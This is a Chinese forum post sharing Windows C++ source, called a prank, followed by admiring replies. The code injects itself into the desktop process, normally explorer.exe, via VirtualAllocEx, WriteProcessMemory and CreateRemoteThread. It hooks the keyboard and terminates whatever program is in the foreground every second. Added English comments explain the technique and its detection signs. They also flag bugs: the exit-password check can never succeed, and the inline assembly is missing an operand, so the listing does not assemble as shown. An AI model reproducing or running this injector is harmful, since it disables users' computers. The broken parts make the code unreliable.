一堆类似恶作剧的代码
不记得为什么要写的了,可能是因为太无聊/:L ..整理硬盘看到的, 不忍心直接删了, 来这里发一份.. :)
// test.cpp : Defines the entry point for the application.//
#include "stdafx.h"
// Function-pointer types for every Win32 API the injected code calls.
// The code between mycode and WinMain is copied byte-for-byte into another
// process (see WinMain), so it cannot rely on this image's import table;
// each API is resolved here with GetProcAddress and handed over through
// InjectData instead. For a defender this hand-rolled "import table" plus
// a magic marker is the characteristic shape of a shellcode data block.
typedef int (WINAPI *MESSAGEBOXA)(HWND, LPCTSTR, LPCTSTR, UINT); // MessageBoxA prototype
typedef HHOOK (WINAPI *SETWINDOWSHOOKEXA)(int,HOOKPROC, HINSTANCE, DWORD); // SetWindowsHookEx prototype
typedef BOOL (WINAPI *UNHOOKWINDOWSHOOKEX)(HHOOK); // UnhookWindowsHookEx prototype
typedef UINT (WINAPI *SETTIMER)(HWND, UINT, UINT, TIMERPROC); // SetTimer prototype
typedef BOOL (WINAPI *KILLTIMER)(HWND, UINT); // KillTimer prototype
typedef BOOL (WINAPI *TERMINATEPROCESS)(HANDLE, UINT); // TerminateProcess prototype
typedef HWND (WINAPI *GETFOREGROUNDWINDOW)(); // GetForegroundWindow prototype
typedef DWORD (WINAPI *GETWINDOWTHREADPROCESSID)(HWND, LPDWORD); // GetWindowThreadProcessId prototype
typedef VOID (WINAPI *SLEEP)(DWORD); // Sleep prototype
typedef HANDLE (WINAPI *OPENPROCESS)(DWORD, BOOL, DWORD); // OpenProcess prototype
typedef LRESULT (WINAPI *CALLNEXTHOOKEX)(HHOOK, int, WPARAM, LPARAM); // CallNextHookEx prototype
typedef BOOL (WINAPI *CLOSEHANDLE)(HANDLE); // CloseHandle prototype
typedef DWORD (WINAPI *GETCURRENTTHREADID)(VOID); // GetCurrentThreadId prototype (resolved but never called)
// Data block that WinMain writes into the remote allocation directly after
// the copied code. The injected functions locate it by scanning memory for
// dwMagic (GetDataAddress); the remote thread parameter is not used for that.
typedef struct { // injected data
    DWORD dwMagic;                                          // 0x11111111, the marker GetDataAddress probes for
    MESSAGEBOXA pfnMessageBoxA;                             // only referenced from a commented-out line
    SETWINDOWSHOOKEXA pfnSetWindowsHookExA;
    UNHOOKWINDOWSHOOKEX pfnUnHookWindowsHookEx;
    SETTIMER pfnSetTimer;                                   // unused: the SetTimer path in mycode is commented out
    KILLTIMER pfnKillTimer;                                 // unused: the KillTimer path in mycode is commented out
    TERMINATEPROCESS pfnTerminateProcess;
    GETFOREGROUNDWINDOW pfnGetForegroundWindow;
    GETWINDOWTHREADPROCESSID pfnGetWindowThreadProcessId;
    SLEEP pfnSleep;
    OPENPROCESS pfnOpenProcess;
    CALLNEXTHOOKEX pfnCallNextHookEx;
    CLOSEHANDLE pfnCloseHandle;
    GETCURRENTTHREADID pfnGetCurrentThreadId;               // resolved in WinMain, never called
    LPVOID pVirtualMemory;                                  // remote base: copied code first, this struct after it
    DWORD dwCodeLen;                                        // bytes of copied code, rounded up to a multiple of 100; only written, never read by the injected code
    DWORD dwDesktopProcessId;                               // PID that owns the "Progman" desktop window; the one PID TimerProc spares
    DWORD dwDesktopThreadId;                                // thread that owns "Progman"; the WH_KEYBOARD hook is installed on it
    bool Quit;                                              // set by KeyboardProc once the digit sequence is typed; ends mycode's loop
    HHOOK hhk;                                              // handle from SetWindowsHookExA, used by CallNextHookEx and the unhook
    UINT uTimerId;                                          // unused: timer calls are commented out
    DWORD dwPosition;                                       // digits of the exit sequence matched so far
}InjectData, *pInjectData;
LRESULT CALLBACK KeyboardProc(int, WPARAM, LPARAM); // keyboard hook callback
VOID CALLBACK TimerProc(HWND, UINT, UINT, DWORD); // timer callback (called directly from mycode's loop)
pInjectData GetDataAddress(LPVOID, LPVOID); // locates InjectData inside the remote allocation
// Entry point of the injected code. Runs as a remote thread inside the process
// that owns the desktop window (started by CreateRemoteThread in WinMain).
// Everything from here up to WinMain is copied verbatim into that process, so
// these functions use nothing but the pointers in InjectData: no globals, no
// string literals, no direct API calls.
//
// lpParam: the remote address of InjectData as passed by CreateRemoteThread;
//          ignored here, the block is found by scanning for its magic instead.
// Returns 0 once Quit has been set and the keyboard hook removed.
DWORD WINAPI mycode(LPVOID lpParam)
{
    pInjectData Data = GetDataAddress(mycode, mycode);
    // Relocate the callbacks by hand: their copies sit at the same offset from
    // the remote base as the originals do from mycode. The absolute addresses
    // used here belong to the injector's image, but only their difference is
    // used, which does not depend on where the code was loaded.
    HOOKPROC MyKeyboardProc = (HOOKPROC)((DWORD)Data->pVirtualMemory + ((DWORD)KeyboardProc - (DWORD)mycode));
    TIMERPROC MyTimerProc = (TIMERPROC)((DWORD)Data->pVirtualMemory + ((DWORD)TimerProc - (DWORD)mycode)); // only needed by the disabled SetTimer path
    // Thread-specific keyboard hook on the desktop window's thread, with a NULL
    // module handle: the hook procedure lives in an unbacked RWX allocation,
    // not in any loaded DLL, which is unusual and something memory-scanning
    // tooling keys on.
    Data->hhk = Data->pfnSetWindowsHookExA(WH_KEYBOARD, MyKeyboardProc, NULL, Data->dwDesktopThreadId); // install keyboard hook
    // Data->uTimerId = Data->pfnSetTimer(NULL, NULL, 1000, MyTimerProc); // start the timer (disabled)
    while (true) {
        Data->pfnSleep(1000);
        TimerProc(0,0,0,0); // once a second: terminate the foreground process (see TimerProc)
        // Quit is only ever set by KeyboardProc; see the note there on why the
        // comparison that sets it can practically never succeed.
        if (Data->Quit) {
            // Data->pfnKillTimer(NULL, Data->uTimerId);
            Data->pfnUnHookWindowsHookEx(Data->hhk);
            break;
        }
    }
    return 0;
}
// WH_KEYBOARD hook procedure; after injection it runs on the desktop window's
// thread. Watches for a fixed sequence of digit keys and sets Data->Quit when
// the whole sequence has been typed, which makes mycode unhook and exit.
// Parameters and return value follow the HOOKPROC contract; the event is
// always forwarded with CallNextHookEx.
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
    pInjectData Data = GetDataAddress(mycode, KeyboardProc);
    // Bit 30 of a WH_KEYBOARD lParam is the previous-key-state flag, so this
    // presumably reacts to key-up / auto-repeat rather than the first key-down.
    if ((code == HC_ACTION) && (lParam & 0x40000000)) {
        // Virtual-key codes for the digits '6','6','1','6','1','1','6'
        // (VK_0..VK_9 equal the digits' ASCII codes).
        unsigned char szPassword[] = {0x36,0x36,0x31,0x36,0x31,0x31,0x36};
        // NOTE(review): this compares the key code with the ADDRESS of the
        // array, not with one of its elements, so it can practically never be
        // true: dwPosition is reset on every key, Quit is never set, and the
        // hook and the loop in mycode never terminate.
        if ((DWORD)wParam == szPassword)
            Data->dwPosition++;
        else
            Data->dwPosition = 0;
        if (Data->dwPosition == sizeof(szPassword)) {
            Data->Quit = true;
            //Data->pfnMessageBoxA(0, (char*)&wParam, 0, 0);
        }
    }
    return Data->pfnCallNextHookEx(Data->hhk, code, wParam, lParam);
}
// Called directly by mycode once per second (the SetTimer path is commented
// out, so hwnd/uMsg/idEvent/dwTime are always 0 and unused). Terminates the
// process that owns the foreground window unless it is the desktop process
// itself. This is the destructive part of the payload: with a kill every
// second the user cannot keep any other program in the foreground.
VOID CALLBACK TimerProc(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime)
{
    pInjectData Data = GetDataAddress(mycode, TimerProc);
    DWORD dwCurrProcId;
    // NOTE(review): dwCurrProcId is never initialised; when GetForegroundWindow
    // returns NULL the lookup fails and the value tested below is indeterminate.
    Data->pfnGetWindowThreadProcessId(Data->pfnGetForegroundWindow(), &dwCurrProcId);
    // Only even PIDs; Windows PIDs are typically multiples of 4, so in practice
    // this filter excludes nothing.
    if (!(dwCurrProcId % 2)) {
        if (dwCurrProcId != Data->dwDesktopProcessId) {
            // The OpenProcess result is not checked for NULL before use.
            HANDLE hProc = Data->pfnOpenProcess(PROCESS_ALL_ACCESS, false, dwCurrProcId);
            Data->pfnTerminateProcess(hProc, 0x0);
            Data->pfnCloseHandle(hProc);
        }
    }
}
// Finds the InjectData block that WinMain wrote into the remote allocation.
// Neither parameter is used. The inline assembly is meant to load some
// address into dwVM, presumably one inside the injected code; the operand of
// `mov eax, dword ptr` is missing from this listing (everything after `;` is
// an assembler comment), so the block as shown does not assemble. The search
// then starts at that address rounded down to a 64 KiB boundary and probes
// every 100 bytes for dwMagic. That only works because WinMain places the
// struct at a multiple of 100 bytes from the allocation base (nCodeLen is
// rounded up to a multiple of 100) and because VirtualAllocEx is relied on
// to return a 64 KiB-aligned base.
//
// NOTE(review): the loop has no upper bound and no check that the probed
// memory is mapped; if the magic is not found it reads until it faults,
// inside the process it was injected into.
pInjectData GetDataAddress(LPVOID lpEntryAddress, LPVOID lpCurrentAddress)
{
    DWORD dwVM = 0;
    __asm {
        push eax;
        mov eax, dword ptr ;
        mov dwVM, eax;
        pop eax;
    }
    pInjectData pDataAddress = (pInjectData)(dwVM & 0xFFFF0000);
    while (true) {
        if (pDataAddress->dwMagic == 0x11111111)
            return (pInjectData)pDataAddress;
        pDataAddress = (pInjectData)((char*)pDataAddress + 100); // same 100-byte stride WinMain aligns the code length to
    }
}
// Injector. Locates the process that owns the desktop ("Progman") window,
// normally explorer.exe, allocates executable+writable memory in it, copies
// the raw bytes of mycode..GetDataAddress plus an InjectData block there, and
// starts mycode as a remote thread. This is the textbook OpenProcess /
// VirtualAllocEx(PAGE_EXECUTE_READWRITE) / WriteProcessMemory /
// CreateRemoteThread sequence that endpoint telemetry (for example Sysmon's
// CreateRemoteThread and ProcessAccess events) is built to surface.
// The standard WinMain parameters are unused. Always returns 0; failures are
// only reported through message boxes.
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR lpCmdLine,
                     int nCmdShow)
{
    DWORD dwDesktopProcID; // process ID of the desktop
    // Length of the code to inject. Assumes the compiler lays out mycode,
    // KeyboardProc, TimerProc and GetDataAddress contiguously, in source order,
    // with WinMain immediately after them (no reordering, no inlining).
    DWORD nCodeLen = (DWORD)WinMain - (DWORD)mycode; // length of the code to inject
    InjectData Data; // injected data
    DWORD dwStructLen = sizeof(InjectData); // length of the injected data
    DWORD dwSizeOfVirtual; // size of memory to allocate
    Data.dwMagic = 0x11111111;
    Data.dwPosition = 0;
    // Round up to a multiple of 100 so GetDataAddress's 100-byte probe lands on the struct.
    nCodeLen = 100 + (nCodeLen - 1) / 100 * 100;
    dwSizeOfVirtual = nCodeLen + dwStructLen; // compute the size to allocate
    // initialise the injected data
    Data.dwCodeLen = nCodeLen;
    Data.Quit = false;
    //
    // Resolve the API addresses the remote thread will call. Passing raw
    // pointers across processes only works because user32/kernel32 are mapped
    // at the same base in every process of a session. None of the
    // GetProcAddress results are checked; a NULL would be called blindly
    // inside the target process.
    HINSTANCE hLib = LoadLibrary("User32.dll");
    if (hLib) {
        Data.pfnGetForegroundWindow = (GETFOREGROUNDWINDOW)GetProcAddress(hLib, "GetForegroundWindow");
        Data.pfnKillTimer = (KILLTIMER)GetProcAddress(hLib, "KillTimer");
        Data.pfnMessageBoxA = (MESSAGEBOXA)GetProcAddress(hLib, "MessageBoxA");
        Data.pfnSetTimer = (SETTIMER)GetProcAddress(hLib, "SetTimer");
        Data.pfnSetWindowsHookExA = (SETWINDOWSHOOKEXA)GetProcAddress(hLib, "SetWindowsHookExA");
        Data.pfnUnHookWindowsHookEx = (UNHOOKWINDOWSHOOKEX)GetProcAddress(hLib, "UnhookWindowsHookEx");
        Data.pfnGetWindowThreadProcessId = (GETWINDOWTHREADPROCESSID)GetProcAddress(hLib, "GetWindowThreadProcessId");
        Data.pfnCallNextHookEx = (CALLNEXTHOOKEX)GetProcAddress(hLib, "CallNextHookEx");
        FreeLibrary(hLib);
    } else {
        MessageBox(NULL, "加载User32.dll失败", 0, MB_OK);
        return 0;
    }
    hLib = LoadLibrary("Kernel32.dll");
    if (hLib) {
        Data.pfnTerminateProcess = (TERMINATEPROCESS)GetProcAddress(hLib, "TerminateProcess");
        Data.pfnSleep = (SLEEP)GetProcAddress(hLib, "Sleep");
        Data.pfnOpenProcess = (OPENPROCESS)GetProcAddress(hLib, "OpenProcess");
        Data.pfnCloseHandle = (CLOSEHANDLE)GetProcAddress(hLib, "CloseHandle");
        Data.pfnGetCurrentThreadId = (GETCURRENTTHREADID)GetProcAddress(hLib, "GetCurrentThreadId");
        FreeLibrary(hLib);
    } else {
        MessageBox(NULL, "加载Kernel32.dll失败", 0, MB_OK);
        return 0;
    }
    //
    // Start the injection.
    // NOTE(review): if FindWindow returns NULL, GetWindowThreadProcessId fails
    // and dwDesktopProcID is left uninitialised, so the test on the next line
    // reads an indeterminate value.
    Data.dwDesktopThreadId = GetWindowThreadProcessId(FindWindow("Progman", NULL), &dwDesktopProcID); // get the desktop window's thread and process
    if (dwDesktopProcID) {
        Data.dwDesktopProcessId = dwDesktopProcID; // remember the desktop process ID
        HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwDesktopProcID); // open the process in order to allocate space for the injected code
        if (hProcess) {
            // Single RWX region holding both code and data.
            LPVOID pMem = VirtualAllocEx(hProcess, NULL, dwSizeOfVirtual, MEM_COMMIT, PAGE_EXECUTE_READWRITE); // allocate memory in the target process for the code
            if (pMem) {
                Data.pVirtualMemory = pMem;
                LPVOID lpDataAddress = (char*)pMem + nCodeLen; // where the data block is written (a multiple of 100 past the base)
                // Copy the function bytes as-is; any absolute address inside
                // them still refers to this image, which the injected code
                // sidesteps by using only offsets and the pointer table.
                if ((!WriteProcessMemory(hProcess, pMem, (LPVOID)mycode, nCodeLen, NULL) || (!WriteProcessMemory(hProcess, lpDataAddress, (LPVOID)&Data, dwStructLen, NULL)))) { // write our own code
                    MessageBox(NULL,"注入代码时失败", "提示", MB_OK);
                    VirtualFreeEx(hProcess, pMem, dwSizeOfVirtual, MEM_RELEASE);
                }
                else
                    // The thread handle is closed immediately and a NULL from a
                    // failed CreateRemoteThread goes unnoticed; lpDataAddress is
                    // passed as the thread parameter but mycode ignores it.
                    CloseHandle(CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, lpDataAddress, 0, NULL)); // run the code
            }
            CloseHandle(hProcess);
        }
    }
    return 0;
}
看不懂。膜拜下。。。 作用就在Explore.exe里面注入段代码,然后不停的把最前台的程序杀掉,让你什么程序也运行不了./:017 厉害,好好学习!!! 太复杂了吧,懒得看了 呵呵,有些地方被换行了,看上去代码是乱糟糟的. 不错啊。 原帖由 xingke 于 2007-11-3 16:16 发表 https://www.chinapyg.com/images/common/back.gif
不错啊。
啊了,我也终于有个精华了,3Q. 哈哈
好狠的代码